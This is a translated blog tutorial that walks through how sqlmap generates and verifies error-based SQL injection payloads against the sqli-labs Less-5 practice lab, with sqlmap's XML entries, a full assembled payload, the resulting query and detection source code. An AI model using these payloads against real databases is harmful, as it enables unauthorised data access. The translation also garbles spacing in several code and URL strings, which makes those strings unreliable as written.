Python: error-based blind (error-based blind) and sqlmaperror-based

Python: error-based blind (error-based blind) and sqlmaperror-based
Target URL

Http: // 127.0.0.1/shentou/sqli-labs-master/Less-5 /? Id = 1

Payload generation

 1 <test> 2     <title>MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause</title> 3     <stype>2</stype> 4     <level>1</level> 5     <risk>0</risk> 6     <clause>1</clause> 7     <where>1</where> 8     <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</vector> 9     <request>10         <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>11     </request>12     <response>13         <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>14     </response>15     <details>16         <dbms>MySQL</dbms>17         <dbms_version>&gt;= 5.0</dbms_version>18     </details>19 </test>

The test xml element is extracted from the file payloads. xml.

Sqlmap reads the test element in the payloads. xml file, traverses it cyclically, and generates the corresponding payload for testing.

The preceding test is used as an example. When traversing the test, you also need to traverse the boundary Elements in the subloop (all in payloads. and find a matching boundary.

What is matching?

Note the sub-nodes of the test element above: where = 1 and clause = 1

When and only when the where node value of a boundary element contains the child node of the test element and the clause node value contains the child node of the test element, the boundary can match the current test to generate a payload.

For example:

1 <boundary>2     <level>1</level>3     <clause>1</clause>4     <where>1,2</where>5     <ptype>2</ptype>6     <prefix>'</prefix>7     <suffix>AND '[RANDSTR]'='[RANDSTR]</suffix>8 </boundary>

The value of the where node in the boundary element is 1, 2, and the value of the where node containing the test element (1)

In addition, the clause node value in the boundary element is 1, and the where node value containing the test element IS (1)

Therefore, the boundary and test elements can match.

The payload value of the test element is:

AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

The final payload is based on the values of the payload subnode of test and the prefix and suffix subnode of boundary, that is:

Final payload = url parameter + boundary. prefix + test. payload + boundary. suffix

Replace [RANDNUM], [DELIMITER_START], and [DELIMITER_STOP]

The generated payload is similar to the following:

Payload: Id = 1' AND (SELECT 1497 FROM (select count (*), CONCAT (CHAR (58,101,121,111, 58), (SELECT (case when (1497 = 1497) THEN 1 ELSE 0 END), CHAR (58,97, 98,104, 58), FLOOR (RAND (0) * 2) x FROM information_schema.tables group by x)) AND 'pujm '= 'pujm

Where:

• URL parameters: Id = 1
• Prefix:'
• Payload: AND (SELECT 1497 FROM (select count (*), CONCAT (CHAR (58,101,121,111, 58), (SELECT (case when (1497 = 1497) THEN 1 ELSE 0 END )), CHAR (58,97, 98,104, 58), FLOOR (RAND (0) * 2) x FROM information_schema.tables group by x))
• Suffix: AND 'pujm '= 'pujm

The final mysql statement is:

SELECT    *FROM    usersWHERE    id = '1'AND (    SELECT        1497    FROM        (            SELECT                COUNT(*),                CONCAT(                    CHAR (58, 101, 121, 111, 58),                    (                        SELECT                            (                                CASE                                WHEN (1497 = 1497) THEN                                    1                                ELSE                                    0                                END                            )                    ),                    CHAR (58, 97, 98, 104, 58),                    FLOOR(RAND(0) * 2)                ) x            FROM                information_schema. TABLES            GROUP BY                x        ) a)AND 'pujM' = 'pujM'

If the url is http: // 127.0.0.1/shentou/sqli-labs-master/Less-5 /? If id = 1 can be injected, the following error will be reported during execution:

Duplicate entry ': eyo: 1: abh: 1' for key'group _ key'

Source code explanation

 1 # In case of error-based SQL injection 2 elif method == PAYLOAD.METHOD.GREP: 3     # Perform the test's request and grep the response 4     # body for the test's <grep> regular expression 5     try: 6         page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False) 7         output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \ 8                 or extractRegexResult(check, listToStrValue(headers.headers \ 9                 if headers else None), re.DOTALL | re.IGNORECASE) \10                 or extractRegexResult(check, threadData.lastRedirectMsg[1] \11                 if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \12                 threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)13 14         if output:15             result = output == "1"16             if result:17                 infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)18                 logger.info(infoMsg)19 20                 injectable = True21 22     except sqlmapConnectionException, msg:23         debugMsg  = "problem occured most likely because the "24         debugMsg += "server hasn't recovered as expected from the "25         debugMsg += "error-based payload used ('%s')" % msg26         logger.debug(debugMsg)

Pass the final payload to the Request. queryPage function for execution and return the final execution result page.

The value of the grep subnode of the test element is a regular expression: <grep> [DELIMITER_START] (? P & lt; result & gt ;.*?) [DELIMITER_STOP] </grep>

From the preceding data, we know that

[DELIMITER_START] =: eyo:

[DELIMITER_STOP] =: abh:

The generated regular expression is: eyo :(? P <result> .*?) : Abh: (each generation is different, because: eyo: And: abh: Are all randomly generated)

Pass the page and regular expression to the function extractRegexResult

 1 def extractRegexResult(regex, content, flags=0): 2     """ 3     Returns 'result' group value from a possible match with regex on a given  4     content 5     """ 6  7     retVal = None 8  9     if regex and content and '?P<result>' in regex:10         match = getCompiledRegex(regex, flags).search(content)11 12         if match:13             retVal = match.group("result")14 15     return retVal

The function is simple. It mainly uses regular expressions to determine whether the specified data is contained. If yes, the system returns matched data. If no, the system returns None.

From the previous content, we can see that if the url can be injected, the returned retVal value should be equal to "1"

if output:    result = output == "1"    if result:        infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)        logger.info(infoMsg)        injectable = True

Use the regular expression: eyo :(? P <result> .*?) : Abh: To match Duplicate entry ': eyo: 1: abh: 1' for key'group _ key'. The result is: 1.

Therefore, url: http: // 127.0.0.1/shentou/sqli-labs-master/Less-5 /? Id = 1 injected

Read

Five error reporting methods and specific use cases during Mysql Injection

Copyright

Author: Former Civil Engineer

Reprinted please indicate the source: http://www.cnblogs.com/hongfei/p/sqlmap-error-based-blind.html